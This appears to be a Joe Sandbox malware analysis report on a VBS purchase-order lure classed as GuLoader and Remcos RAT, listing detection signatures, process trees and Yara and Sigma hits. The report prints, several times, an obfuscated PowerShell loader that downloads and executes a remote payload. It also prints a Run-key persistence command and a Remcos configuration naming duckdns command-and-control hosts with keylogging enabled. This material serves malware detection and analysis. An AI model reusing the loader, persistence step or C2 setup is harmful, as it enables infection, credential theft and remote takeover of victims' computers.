Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs

Overview

General Information

Sample name:TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
Analysis ID:1465344
MD5:003c272edd6f7cf2b08bfc98d1d48c7c
SHA1:a6ee590e3b81dbbce6e550c6dba9256c76cd4e21
SHA256:78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6
Tags:vbs
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3476 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4952 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3892 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4540 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2264 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 6008 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 1016 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 6424 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5664 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5804 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 1060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "janbours92harbu02.duckdns.org:3980:0janbours92harbu02.duckdns.org:3981:1janbours92harbu03.duckdns.org:3980:0", "Assigned name": "Proof007", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jmoughoe-LDOW5Q", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kpburtts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\kpburtts.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000005.00000002.2561951332.0000000009D33000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            0000000B.00000002.3423964489.0000000004633000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 7 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_1908.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_3892.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xd861:$b2: ::FromBase64String(
                • 0xc8db:$s1: -join
                • 0x6087:$s4: +=
                • 0x6149:$s4: +=
                • 0xa370:$s4: +=
                • 0xc48d:$s4: +=
                • 0xc777:$s4: +=
                • 0xc8bd:$s4: +=
                • 0x15652:$s4: +=
                • 0x156d2:$s4: +=
                • 0x15798:$s4: +=
                • 0x15818:$s4: +=
                • 0x159ee:$s4: +=
                • 0x15a72:$s4: +=
                • 0xd100:$e4: Get-WmiObject
                • 0xd2ef:$e4: Get-Process
                • 0xd347:$e4: Start-Process
                • 0x162e5:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs", CommandLine|base64offset|contains: Q5, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs", ProcessId: 3476, ProcessName: wscript.exe
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 2264, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", ProcessId: 6008, ProcessName: cmd.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Likvidationsprovenuet
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6008, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", ProcessId: 1016, ProcessName: reg.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 2264, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)", ProcessId: 6008, ProcessName: cmd.exe
                Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Likvidationsprovenuet
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs", CommandLine|base64offset|contains: Q5, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs", ProcessId: 3476, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = 